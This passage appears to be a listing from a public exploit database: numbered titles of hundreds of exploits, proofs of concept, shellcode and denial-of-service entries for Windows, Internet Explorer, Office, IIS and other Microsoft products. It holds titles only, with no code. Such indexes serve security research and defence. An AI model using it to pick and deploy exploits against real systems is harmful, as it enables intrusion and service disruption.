NT4ALL DoS Vulnerability [20907] Microsoft Windows 2000 Telnet Username DoS Vulnerability [20861] Microsoft Windows Kernel Intel x64 SYSRET PoC [20613] Microsoft Windows 98/2000 UDP Socket DoS Vulnerability [20596] Microsoft Windows NT 4.0 Networking Mutex DoS Vulnerability [20564] Microsoft Windows NT 4.0 SNMP-WINS DoS Vulnerability [20553] Microsoft Windows Media Player 7.0 .WMZ Arbitrary Java Applet Vulnerability [20528] Microsoft Windows Media Player 7.0 Javascript URL Vulnerability [20460] Microsoft Windows NT 4.0 PhoneBook Server Buffer Overflow [20427] Microsoft Windows Media Player 7.0 .ASX Buffer Overflow Vulnerability [20424] Microsoft Windows Media Player 7.0 .WMS Arbitrary Script Vulnerability [20399] Microsoft Indexing Services for Windows 2000 File Verification Vulnerability [20371] Microsoft Windows 95/WfW smbclient Directory Traversal Vulnerability [20335] Microsoft Indexing Services for Windows 2000/NT 4.0 .htw Cross-Site Scripting Vulnerability [20317] Microsoft Windows NT 4.0 MSIEXEC Registry Permissions Vulnerability [20288] Microsoft Windows 9x File Handle Buffer Overflow Vulnerability [20284] Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability (2) [20283] Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability (1) [20265] Microsoft Windows NT 4.0 / 2000 Spoofed LPC Request Vulnerability [20257] Microsoft Windows NT 4.0 / 2000 Predictable LPC Message Identifier Multiple Vulnerabilities [20255] Microsoft Windows NT 4.0 / 2000 LPC Zone Memory Depletion DoS Vulnerability [20254] Microsoft Windows NT 4.0 Invalid LPC Request DoS Vulnerability [20243] Microsoft Windows Script Host 5.1/5.5 GetObject() File Disclosure Vulnerability [20240] Microsoft Windows Media Player 7 Embedded OCX Control Vulnerability [20222] Microsoft Windows 2000 telnet.exe NTLM Authentication Vulnerability [20209] Microsoft Windows 2000 Still Image Service Privilege Escalation Vulnerability [20133] Microsoft Windows 2000 Named Pipes Predictability Vulnerability [20106] Microsoft Windows NT 4/2000 NetBIOS Name Conflict Vulnerability [20048] Microsoft Windows 2000 Remote CPU-overload Vulnerability [20047] Microsoft Windows 2000 Telnet Server DoS Vulnerability [19974] Microsoft Windows Media Services 4.0/4.1 DoS Vulnerability [19889] Microsoft Windows 95/98 NetBIOS NULL Name Vulnerability [19798] Microsoft Windows NT 4.0 User Shell Folders Vulnerability [19759] Microsoft Windows Media Services 4.0/4.1 Handshake Sequence DoS [19754] Microsoft Windows 95/98/NT 4.0 autorun.inf Vulnerability [19739] Microsoft Windows NT 4.0 Recycle Bin Pre-created Folder Vulnerability [19731] microsoft index server 2.0/indexing services for windows 2000 - Directory Traversal [19673] Microsoft Windows 95/98/NT 4.0 Help File Trojan Vulnerability [19578] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Services.exe Denial of Service (2) [19577] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Services.exe Denial of Service (1) [19502] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 RASMAN Privilege Escalation Vulnerability [19489] Microsoft Windows NT 4.0 DCOM Server Vulnerability [19462] Microsoft Windows 95/98 IE5/Telnet Heap Overflow Vulnerability [19451] Microsoft Windows 98 a/98 b/98SE,Solaris 2.6 IRDP Vulnerability [19440] Microsoft Windows NT 4.0/SP 1/SP 2/Sp 3/SP 4/SP 5 Malformed Dialer Entry Vulnerability [19372] Microsoft Windows NT 4.0/SP 1/SP 2/SP 3/SP 4/SP 5 Null Session Admin Name Vulnerability [19359] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4,Windows NT 3.5.1/SP1/SP2/SP3/SP4/SP5 Screensaver Vulnerability [19239] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 IIS IDC Path Mapping Vulnerability [19238] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 DoS Duplicate Hostname Vulnerability [19211] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Phonebook Buffer Overflow Vulnerability [19209] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Help File Buffer Overflow Vulnerability [19198] Microsoft Windows NT <= 4.0 SP4 Known DLL Cache Vulnerability [19197] "Microsoft Windows NT <= 4.0 SP5,Terminal Server 4.0 ""Pass the Hash"" with Modified SMB Client Vulnerability" [19196] "Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Dial-up Networking ""Save Password"" Vulnerability" [19195] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 LSA Secrets Vulnerability [19143] "Microsoft Windows ""April Fools 2001"" Vulnerability" [19113] Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Telnetd Vulnerability [19103] HP HP-UX <= 10.34,Microsoft Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 [19002] Microsoft Windows OLE Object File Handling Remote Code Execution [18819] Microsoft Windows xp Win32k.sys Local Kernel DoS Vulnerability [18372] Microsoft Windows Assembly Execution Vulnerability MS12-005 [17305] "Microsoft Windows Vista/Server 2008 ""nsiproxy.sys"" Local Kernel DoS Exploit" [17133] Microsoft Windows xp AFD.sys Local Kernel DoS Exploit [17037] PostgreSQL for Microsoft Windows Payload Execution [16957] Oracle MySQL for Microsoft Windows Payload Execution [16660] Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow [16574] Microsoft Windows Shell LNK Code Execution [16374] Microsoft Windows Authenticated User Code Execution [16363] Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference [16360] Microsoft Windows SMB Relay Code Execution [15839] Microsoft Windows Fax Services Cover Page Editor (.cov) Memory Corruption [14778] Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll) [14733] Microsoft Windows 7 wab.exe DLL Hijacking Exploit (wab32res.dll) [14731] Microsoft Windows Movie Maker <= 2.6.4038.0 DLL Hijacking Exploit (hhctrl.ocx) [14705] Microsoft Windows (IcmpSendEcho2Ex interrupting) Denial of Service Vulnerability [14674] Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (MS09-050) [14670] Microsoft Windows nt!SeObjectCreateSaclAccessBits() Missed ACE Bounds Checks (MS10-047) [14669] Microsoft Windows win32k!GreStretchBltInternal() Does Not Handle src == dest [14668] Microsoft Windows win32k!xxxRealDrawMenuItem() Missing HBITMAP Bounds Checks [14667] Microsoft Windows KTM Invalid Free with Reused Transaction GUID (MS10-047) [14666] Microsoft Windows nt!NtCreateThread Race Condition with Invalid Code Segment (MS10-047) [14611] Microsoft Windows 'SfnLOGONNOTIFY' Local Privilege Escalation Vulnerability (MS10-048) [14610] Microsoft Windows Tracing Registry Key ACL Privilege Escalation Vulnerability [14608] Microsoft Windows CreateWindow Function Callback Vulnerability (MS10-048) [14566] "Microsoft Windows win32k.sys Driver ""CreateDIBPalette()"" Buffer Overflow" [14403] Microsoft Windows Automatic LNK Shortcut File Code Execution [13808] Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly [12564] Microsoft Windows Outlook Express and Windows Mail Integer Overflow [11195] Microsoft Windows Defender ActiveX Heap Overflow PoC [10068] Microsoft Windows 2000-2008 Embedded OpenType Font Engine Remote Code Execution [9301] Microsoft Windows XP (win32k.sys) Local Privilege Escalation Exploit [4045] Microsoft Windows Animated Cursor Stack Overflow Exploit [3746] Microsoft Windows DNS RPC - Remote Buffer Overflow Exploit (port 445) (2) [1352] Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated) [31118] Microsoft Works 8.0 File Converter Field Length Remote Code Execution Vulnerability [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability [30887] phPay 2.2.1 Windows Installations Local File Include Vulnerability [30773] Microsoft Jet Database Engine MDB File Parsing Remote Buffer Overflow Vulnerability [30767] Apple Safari 3.0.x for Windows Document.Location.Hash Buffer Overflow Vulnerability [30756] Microsoft Forms 2.0 ActiveX Control 2.0 Memory Access Violation Denial of Service Vulnerabilities [30749] Microsoft Office 2003 Web Component Memory Access Violation Denial of Service Vulnerability [30622] Microsoft Internet Explorer 5.0.1 File Upload Vulnerability [30593] Microsoft MFC Library CFileFind::FindFile Buffer Overflow Vulnerability [30567] Microsoft Agent agentdpv.dll ActiveX Control Malformed URL Stack Buffer Overflow Vulnerability [30537] Microsoft MSN Messenger <= 8.0 - Video Conversation Buffer Overflow Vulnerability [30494] Microsoft Internet Explorer 5.0.1 Vector Markup Language VGX.DLL Remote Buffer Overflow Vulnerability [30493] Microsoft XML Core Services <= 6.0 SubstringData Integer Overflow Vulnerability [30490] Microsoft Internet Explorer 5.0.1 TBLinf32.DLL ActiveX Control Remote Code Execution Vulnerability [30455] Microsoft Internet Explorer 6.0 Position:Relative Denial of Service Vulnerability [30397] Windows Kernel win32k.sys - Integer Overflow (MS13-101) [30285] Microsoft Internet Explorer and Mozilla Firefox URI Handler Command Injection Vulnerability [30281] Microsoft .Net Framework <= 2.0 - Multiple Null Byte Injection Vulnerabilities [30194] Apple Safari 3 for Windows Document.Location Denial of Service Vulnerability [30193] Apple Safari 3.0.1 for Windows Corefoundation.DLL Denial of Service Vulnerability [30176] Apple Safari 3 for Windows Protocol Handler Command Injection Vulnerability [30169] WindowsPT 1.2 User ID Key Spoofing Vulnerability [30014] Windows NDPROXY - Local SYSTEM Privilege Escalation [30011] Microsoft Tagged Image File Format (TIFF) Integer Overflow [29951] Microsoft SharePoint Server 3.0 Cross-Site Scripting Vulnerability [29858] MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access [29800] Microsoft Internet Explorer 7.0 HTML Denial of Service Vulnerability [29741] Microsoft Internet Explorer 7.0 NavCancel.HTM Cross-Site Scripting Vulnerability [29664] Microsoft Office Publisher 2007 - Remote Denial of Service (DoS) Vulnerability [29660] Microsoft Office 2003 - Denial of Service (DoS) Vulnerability [29619] Microsoft Internet Explorer 6.0 - Local File Access Weakness [29536] Microsoft Internet Explorer 5.0.1 - Multiple ActiveX Controls Denial of Service Vulnerabilities [29524] Microsoft Word 2000 - Malformed Function Code Execution Vulnerability [29295] Microsoft Outlook ActiveX Control Remote Internet Explorer Denial of Service Vulnerability [29292] XAMPP for Windows 1.8.2 - Blind SQL Injection [29236] Microsoft Internet Explorer 7.0 CSS Width Element Denial of Service Vulnerability [29229] Microsoft Internet Explorer 6.0 Frame Src Denial of Service Vulnerability [29172] Microsoft Office 97 HTMLMARQ.OCX Library Denial of Service Vulnerability [28996] Messagebox Shellcode (113 bytes) - Any Windows Version [28974] MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free [28897] Microsoft Internet Explorer 7.0 MHTML Denial of Service Vulnerability [28880] Microsoft Internet Explorer 6.0/7.0 RemoveChild Denial of Service Vulnerability [28877] Microsoft Internet Explorer 6.0 Unspecified Code Execution Vulnerability (2) [28876] Microsoft Internet Explorer 6.0 Unspecified Code Execution Vulnerability (1) [28822] Microsoft Class Package Export Tool 5.0.2752 0 Clspack.exe Local Buffer Overflow Vulnerability [28679] Evince PDF Reader - 2.32.0.145 (Windows) and 3.4.0 (Linux) - Denial of Service [28500] Microsoft Indexing Service Query Validation Cross-Site Scripting Vulnerability [28481] MS13-069 Microsoft Internet Explorer CCaret Use-After-Free [28438] Microsoft Internet Explorer 5.0.1 Daxctle.OCX Spline Method Heap Buffer Overflow Vulnerability [28421] Microsoft Internet Explorer 6.0 - Multiple COM Object Color Property Denial of Service Vulnerabilities [28401] Microsoft Internet Explorer 6.0 Visual Studio COM Object Instantiation Denial of Service Vulnerability [28400] Microsoft Internet Explorer 6.0 TSUserEX.DLL ActiveX Control Memory Corruption Vulnerability [28389] Microsoft Internet Explorer 6.0 MSOE.DLL Denial of Service Vulnerability [28387] Microsoft Internet Explorer 6.0 IMSKDIC.DLL Denial of Service Vulnerability [28343] Microsoft Internet Explorer 6.0/7.0 IFrame Refresh Denial of Service Vulnerability [28301] Microsoft Internet Explorer 6.0 Deleted Frame Object Denial of Service Vulnerability [28286] Microsoft Internet Explorer 6.0 NDFXArtEffects Stack Overflow Vulnerability [28265] Microsoft Internet Explorer 6.0 Native Function Iterator Denial of Service Vulnerability [28259] Microsoft Internet Explorer 6.0 NMSA.ASFSourceMediaDescription Stack Overflow Vulnerability [28258] Microsoft Internet Explorer 6.0 - Multiple Object ListWidth Property Denial of Service Vulnerability [28256] Microsoft Internet Explorer 6.0 Internet.HHCtrl Click Denial of Service Vulnerability [28252] Microsoft Internet Explorer 6.0 String To Binary Function Denial of Service Vulnerability [28246] Microsoft Internet Explorer 6.0 OVCtl Denial of Service Vulnerability [28244] Microsoft Internet Explorer 6.0 DataSourceControl Denial of Service Vulnerability [28238] Microsoft SharePoint 2013 (Cloud) - Persistent Exception Handling Vulnerability MS13-067 [28226] Microsoft PowerPoint 2003 PPT File Closure Memory Corruption [28225] Microsoft PowerPoint 2003 powerpnt.exe Unspecified Issue [28224] Microsoft PowerPoint 2003 mso.dll PPT Processing Unspecified Code Execution [28222] microsoft works 8.0 spreadsheet Multiple Vulnerabilities [28213] Microsoft Internet Explorer 6.0 RevealTrans Denial of Service Vulnerability [28207] Microsoft Internet Explorer 6.0 TriEditDocument Denial of Service Vulnerability [28202] Microsoft Internet Explorer 6.0 HtmlDlgSafeHelper Remote Denial of Service Vulnerability [28198] Microsoft Office 2000/2002 Property Code Execution Vulnerability [28197] Microsoft Internet Explorer 6.0 Object.Microsoft.DXTFilter Denial of Service Vulnerability [28196] Microsoft Internet Explorer 6.0 DirectAnimation.DAUserData Denial of Service Vulnerability [28194] Microsoft Internet Explorer 6 RDS.DataControl Denial of Service Vulnerability [28189] Microsoft Excel 2000-2004 Style Handling and Repair Remote Code Execution Vulnerability [28187] MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free [28169] Microsoft Internet Explorer 5.0.1/6.0 Structured Graphics Control Denial of Service Vulnerability [28164] Microsoft Internet Explorer 6.0 Href Title Denial of Service Vulnerability [28145] Microsoft Internet Explorer 6.0 ADODB.Recordset Filter Property Denial of Service Vulnerability [28144] Microsoft Internet Explorer 6.0 OutlookExpress.AddressBook Denial of Service Vulnerability [28118] Microsoft Internet Explorer 5.0.1 OuterHTML Redirection Handling Information Disclosure Vulnerability [28087] Microsoft Office 2003 Embedded Shockwave Flash Object Security Bypass Weakness [28082] MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free [28005] Microsoft Exchange Server 2000/2003 Outlook Web Access Script Injection Vulnerability [28001] Microsoft SMB Driver Local Denial of Service Vulnerability [27984] Microsoft DXImageTransform.Microsoft.Light ActiveX Control Remote Code Execution Vulnerability [27971] Microsoft Internet Explorer 5.0.1 Frameset Memory Corruption Vulnerability [27906] Microsoft Internet Explorer 6.0 Malformed HTML Parsing Denial of Service Vulnerability [27850] Microsoft Infotech Storage Library Heap Corruption Vulnerability [27745] Outlook Express 5.5/6.0,Windows Mail MHTML URI Handler Information Disclosure Vulnerability [27744] Microsoft Internet Explorer 5.0.1 Modal Dialog Manipulation Vulnerability [27727] Microsoft Internet Explorer 6.0 Nested OBJECT Tag Memory Corruption Vulnerability [27620] Microsoft FrontPage Server Extensions Cross-Site Scripting Vulnerability [27577] Microsoft Internet Explorer 5.0 Address Bar Spoofing Vulnerability [27476] Microsoft .NET Framework SDK 1.0/1.1 MSIL Tools Buffer Overflow Vulnerabilities [27433] Microsoft Internet Explorer 5.0.1 Script Action Handler Buffer Overflow Vulnerability [27180] Windows RT ARM Bind Shell (Port 4444) [27082] Microsoft Internet Explorer 5.0.1 Malformed IMG and XML Parsing Denial of Service Vulnerability [27073] Microsoft Visual Studio UserControl Remote Code Execution Vulnerability (2) [27072] Microsoft Visual Studio UserControl Remote Code Execution Vulnerability (1) [27055] Microsoft Excel 95-2004 Malformed Graphic File Code Execution Vulnerability [26985] Microsoft Internet Explorer 5.0.1 HTML Parsing Denial of Service Vulnerabilities [26951] Windows Movie Maker 2.1.4026.0 - (.wav) Crash PoC [26869] Microsoft Excel 95/97/2000/2002/2003/2004 Unspecified Memory Corruption Vulnerabilities [26769] Microsoft Excel 95/97/2000/2002/2003/2004 Malformed Range Memory Corruption Vulnerability [26554] Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation [26517] Microsoft Office PowerPoint 2007 - Crash PoC [26457] Microsoft Internet Explorer 6.0 Malformed HTML Parsing Denial of Service Vulnerability [26292] Microsoft Internet Explorer 5.2.3 for Mac OS Denial of Service Vulnerability [26230] Microsoft IIS 5.1 WebDAV HTTP Request Source Code Disclosure Vulnerability [26175] MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow [26167] Microsoft Visual Studio .NET msdds.dll Remote Code Execution Vulnerability [25999] Microsoft Internet Explorer textNode Use-After-Free [25992] Microsoft Internet Explorer 5.0.1 JPEG Image Rendering CMP Fencepost Denial of Service Vulnerability [25991] Microsoft Internet Explorer 5.0.1 JPEG Image Rendering Unspecified Buffer Overflow Vulnerability [25962] Microsoft ASP.NET 1.0/1.1 RPC/Encoded Remote Denial of Service Vulnerability [25912] Windows NT - Windows 8 EPATHOBJ Local Ring 0 Exploit [25784] Microsoft Outlook Express 4.x/5.x/6.0 Attachment Processing File Extension Obfuscation Vulnerability [25408] Windows Media Player 11.0.0 (.wav) - Crash PoC [25386] Microsoft Internet Explorer 5.0.1 DHTML Object Race Condition Memory Corruption Vulnerability [25385] Microsoft Internet Explorer 5.0.1 Content Advisor File Handling Buffer Overflow Vulnerability [25294] Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability [25157] Microsoft Log Sink Class ActiveX Control Arbitrary File Creation Vulnerability [25129] Microsoft Internet Explorer 6.0 Pop-up Window Title Bar Spoofing Weakness [25110] Microsoft ASP.NET 1.0/1.1 - Unicode Character Conversion Multiple Cross-Site Scripting Vulnerabilities [25095] Microsoft Internet Explorer 5.0.1 Mouse Event URI Status Bar Obfuscation Weakness [25085] Microsoft Office XP 2000/2002 HTML Link Processing Remote Buffer Overflow Vulnerability [25084] Microsoft Outlook 2003 Web Access Login Form Remote URI Redirection Vulnerability [25032] Windows Media Player 9.0 ActiveX Control File Enumeration Weakness [25031] Windows Media Player 9.0 ActiveX Control Media File Attribute Corruption Weakness [24999] Windows Light HTTPD 0.1 - Buffer Overflow [24968] Mikrotik Syslog Server for Windows 1.15 - Denial of Service [24808] Microsoft Internet Explorer 6.0 Search Pane URI Obfuscation Vulnerability [24802] Microsoft Internet Explorer 6.0 Sysimage Protocol Handler Local File Detection Vulnerability [24800] Microsoft Internet Explorer 5.0.1 FTP URI Arbitrary FTP Server Command Execution Vulnerability [24775] Microsoft Internet Explorer 6.0 Infinite Array Sort Denial of Service Vulnerability [24727] Microsoft Internet Explorer 6.0 - Local Resource Enumeration Vulnerability [24720] Microsoft Internet Explorer 6.0 IFRAME Status Bar URI Obfuscation Weakness [24714] Microsoft Internet Explorer 6.0 HTML Form Tags URI Obfuscation Weakness [24712] Microsoft Internet Explorer 6.0 TABLE Status Bar URI Obfuscation Weakness [24705] Microsoft Internet Explorer 6.0 Font Tag Denial of Service Vulnerability [24693] Microsoft Internet Explorer 5.x Valid File Drag and Drop Embedded Code Vulnerability [24687] Microsoft Outlook Express 4.x/5.x/6.0 Plaintext Email Security Policy Bypass Vulnerability [24686] Microsoft Outlook 2003 Security Policy Bypass Vulnerability [24666] Microsoft ASP.NET 1.x URI Canonicalization Unauthorized Web Access Vulnerability [24640] Microsoft SQL Server 7.0 - Remote Denial of Service Vulnerability (2) [24639] Microsoft SQL Server 7.0 - Remote Denial of Service Vulnerability (1) [24637] Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (4) [24636] Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (3) [24635] Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (2) [24634] Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (1) [24538] MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free [24495] Microsoft Internet Explorer SLayoutRun Use-After-Free (MS13-009) [24437] Apple Quick Time Player (Windows) 7.7.3 - Out of Bound Read [24407] Microsoft Internet Explorer 6.0 Resource Detection Weakness [24366] Windows Manage Memory Payload Injection [24354] Microsoft Internet Explorer 6.0 mms Protocol Handler Executable Command Line Injection Vulnerability [24328] Microsoft Internet Explorer 5.0.1 Style Tag Comment Memory Corruption Vulnerability [24281] Microsoft Systems Management Server 1.2/2.0 - Remote Denial of Service Vulnerability [24267] Microsoft Internet Explorer 6.0 JavaScript Null Pointer Exception Denial of Service Vulnerability [24266] Microsoft Internet Explorer 5.0.1 Popup.show Mouse Event Hijacking Vulnerability [24265] Microsoft Internet Explorer 5.0.1 JavaScript Method Assignment Cross-Domain Scripting Vulnerability [24249] Microsoft Internet Explorer 6.0 Shell.Application Object Script Execution Weakness [24213] Microsoft Internet Explorer 5.0.1 Wildcard DNS Cross-Site Scripting Vulnerability [24211] Microsoft Internet Explorer 6.0 HREF Save As Denial of Service Vulnerability [24187] Microsoft Internet Explorer 6.0 ADODB.Stream Object File Installation Weakness [24174] Microsoft Internet Explorer 6.0 URL Local Resource Access Weakness [24135] Microsoft Internet Explorer 5.0.1 CSS Style Sheet Memory Corruption Vulnerability [24119] Microsoft Internet Explorer 5.0.1 http-equiv Meta Tag Denial of Service Vulnerability [24118] Microsoft Outlook Express 6.0 URI Obfuscation Vulnerability [24117] Microsoft Internet Explorer 6.0 Codebase Double Backslash Local Zone File Execution Weakness [24114] Microsoft Outlook 2003Mail Client E-mail Address Verification Weakness [24112] Microsoft Internet Explorer 6.0 XML Parsing Denial of Service Vulnerability [24102] Microsoft Internet Explorer 4/5/6 Embedded Image URI Obfuscation Weakness [24101] Microsoft Outlook 2003 Predictable File Location Weakness [24069] Microsoft Internet Explorer 6.0 Meta Data Foreign Domain Spoofing Vulnerability [24020] Microsoft Internet Explorer Option Element Use-After-Free [24002] Microsoft Outlook Express 6.0 - Remote Denial of Service Vulnerability [23912] Microsoft Internet Explorer 6.0 Macromedia Flash Player Plug-in Remote Denial of Service Vulnerability [23911] Microsoft Internet Explorer 6.0 MSWebDVD Object Denial of Service Vulnerability [23903] Microsoft Internet Explorer 6.0 HTML Form Status Bar Misrepresentation Vulnerability [23796] Microsoft Outlook 2002 Mailto Parameter Quoting Zone Bypass Vulnerability [23790] Microsoft Internet Explorer 5 window.open Search Pane Cross-Zone Scripting Vulnerability [23785] Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability [23768] Microsoft Internet Explorer 6.0 window.open Media Bar Cross-Zone Scripting Vulnerability [23766] Microsoft Internet Explorer 5/6 Cross-Domain Event Leakage Vulnerability [23754] Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability [23695] Microsoft Internet Explorer 5.0.1 ITS Protocol Zone Bypass Vulnerability [23679] Microsoft Internet Explorer 5 Shell: IFrame Cross-Zone Scripting Vulnerability (2) [23678] Microsoft Internet Explorer 5 Shell: IFrame Cross-Zone Scripting Vulnerability (1) [23668] Microsoft Internet Explorer 5.0.1 LoadPicture File Enumeration Weakness [23649] Microsoft SQL Server Database Link Crawling Command Execution [23643] Microsoft Internet Explorer 5 NavigateAndFind() Cross-Zone Policy Vulnerability [23531] HD Soft Windows FTP Server 1.5/1.6 Username Format String Vulnerability [23493] Jordan Windows Telnet Server 1.0/1.2 Username Stack Based Buffer Overrun Vulnerability (3) [23492] Jordan Windows Telnet Server 1.0/1.2 Username Stack Based Buffer Overrun Vulnerability (2) [23491] Jordan Windows Telnet Server 1.0/1.2 Username Stack Based Buffer Overrun Vulnerability (1) [23490] Microsoft IIS 5.0 Failure To Log Undocumented TRACK Requests Vulnerability [23401] Microsoft Outlook Express 6.0 MHTML Forced File Execution Vulnerability (2) [23400] Microsoft Outlook Express 6.0 MHTML Forced File Execution Vulnerability (1) [23340] Microsoft Internet Explorer 6.0 Double Slash Cache Zone Bypass Vulnerability [23321] Microsoft Internet Explorer 6-10 Mouse Tracking [23283] Microsoft Internet Explorer 6.0 - Local Resource Reference Vulnerability [23273] Microsoft Internet Explorer 6.0 Scrollbar-Base-Color Partial Denial of Service Vulnerability [23255] Microsoft ListBox/ComboBox Control User32.dll Function Buffer Overrun Vulnerability [23216] Microsoft Word 97/98/2002 Malformed Document Denial of Service Vulnerability [23215] Microsoft Internet Explorer 6 Absolute Position Block Denial of Service Vulnerability [23131] Microsoft Internet Explorer 6.0 Script Execution Vulnerabilities [23122] Microsoft Internet Explorer 5 XML Page Object Type Validation Vulnerability [23114] Microsoft Internet Explorer 5/6 Browser Popup Window Object Type Validation Vulnerability [23113] Microsoft Exchange Server 4.0/5.0 SMTP HELO Argument Buffer Overflow Vulnerability [23096] Microsoft WordPerfect Converter Buffer Overrun Vulnerability [23095] Microsoft Access 97/2000/2002 Snapshot Viewer ActiveX Control Parameter Buffer Overflow Vulnerability [23094] Microsoft Visual Basic For Applications SDK 5.0/6.0/6.2/6.3 Document Handling Buffer Overrun Vulnerability [23083] MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day [23073] MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot) [23044] Microsoft Internet Explorer 5/6 Object Type Validation Vulnerability [23034] Microsoft URLScan 2.5/ RSA Security SecurID 5.0 Configuration Enumeration Weakness [23007] Windows AlwaysInstallElevated MSI [22959] Microsoft Outlook Express 5/6 Script Execution Weakness [22957] Microsoft SQL Server 7.0/2000,MSDE Named Pipe Denial of Service Vulnerability [22919] Microsoft ISA Server 2000 Cross-Site Scripting Vulnerabilities [22869] Microsoft Outlook 5.5/2000 Web Access HTML Attachment Script Execution Vulnerability [22850] Microsoft Office OneNote 2010 Crash PoC [22784] Microsoft Internet Explorer 5 Custom HTTP Error HTML Injection Vulnerability [22783] Microsoft Internet Explorer 5/6 MSXML XML File Parsing Cross-Site Scripting Vulnerability [22734] Microsoft Internet Explorer 6 %USERPROFILE% File Execution Weakness [22728] Microsoft Internet Explorer 5 Classic Mode FTP Client Cross Domain Scripting Vulnerability [22726] Microsoft Internet Explorer 5 OBJECT Tag Buffer Overflow Vulnerability [22679] Microsoft Visio 2010 Crash PoC [22670] Microsoft IIS 5 WebDAV PROPFIND and SEARCH Method Denial of Service Vulnerability [22655] Microsoft Publisher 2013 Crash PoC [22621] Microsoft Netmeeting 2.1/3.0.1 4.4.3385 CALLTO URL Buffer Overflow Vulnerability [22591] Microsoft Office Excel 2007 - WriteAV Crash PoC [22576] Microsoft SQL Server 7.0/2000 JET Database Engine 4.0 Buffer Overrun Vulnerability [22563] Microsoft IIS 5 User Existence Disclosure Vulnerability (2) [22562] Microsoft IIS 5 User Existence Disclosure Vulnerability (1) [22555] Microsoft BizTalk Server 2000/2002 DTA RawCustomSearchField.asp SQL Injection [22554] Microsoft BizTalk Server 2000/2002 DTA rawdocdata.asp SQL Injection Vulnerability [22553] Microsoft BizTalk Server 2002 HTTP Receiver Buffer Overflow Vulnerability [22530] Microsoft Internet Explorer 5 Remote URLMON.DLL Buffer Overflow Vulnerability [22518] Microsoft Shlwapi.dll 6.0.2800 .1106 Malformed HTML Form Tag DoS Vulnerability [22489] Windows XP PRO SP3 - Full ROP calc shellcode [22390] Microsoft ActiveSync 3.5 Null Pointer Dereference Denial of Service Vulnerability [22330] Microsoft Office Excel 2010 Crash PoC [22310] Microsoft Office Publisher 2010 Crash PoC [22288] Microsoft Internet Explorer 5/6 Self Executing HTML File Vulnerability [22280] Microsoft Outlook2000/Express 6.0 Arbitrary Program Execution Vulnerability [22251] AIX 3.x/4.x,Windows 95/98/2000/NT 4,SunOS 5 gethostbyname() Buffer Overflow [22237] Microsoft Office Picture Manager 2010 Crash PoC [22226] Microsoft Internet Explorer 5 ShowHelp Arbitrary Command Execution Vulnerability [22215] Microsoft Office Word 2010 Crash PoC [22119] Microsoft Pocket Internet Explorer 3.0 - Denial of Service Vulnerability [22027] Microsoft Java Virtual Machine 3802 Series Bytecode Verifier Vulnerability [21994] Windows Escalate Service Permissions Local Privilege Escalation [21986] Windows Media Player 10 - .avi Integer Division By Zero Crash PoC [21959] Microsoft Internet Explorer 5/6 Cached Objects Zone Bypass Vulnerability [21932] Microsoft Outlook Express 5.5/6.0 S/MIME Buffer Overflow Vulnerability [21923] MS Windows XP/2000/NT 4 NetDDE Privilege Escalation Vulnerability (2) [21922] MS Windows XP/2000/NT 4 NetDDE Privilege Escalation Vulnerability (1) [21920] Microsoft Content Management Server 2001 Cross-Site Scripting Vulnerability [21910] Microsoft IIS 5.0 IDC Extension Cross Site Scripting Vulnerability [21902] MS Windows XP/2000/NT 4 Help Facility ActiveX Control Buffer Overflow [21898] SurfControl SuperScout WebFilter for windows 2000 SQL Injection Vulnerability [21897] SurfControl SuperScout WebFilter for windows 2000 File Disclosure Vulnerability [21883] Microsoft Internet Explorer 5 Document Reference Zone Bypass Vulnerability [21845] Windows Escalate UAC Protection Bypass [21843] Windows Escalate UAC Execute RunAs [21840] MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability [21803] Microsoft Internet Explorer 6 URI Handler Restriction Circumvention Vulnerability [21750] Microsoft Internet Explorer 5 Dialog Same Origin Policy Bypass Variant Vulnerability [21749] Microsoft Internet Explorer 5/6 XML Redirect File Disclosure Vulnerability [21747] MS Windows 2000/NT 4/XP Network Share Provider SMB Request Buffer Overflow (2) 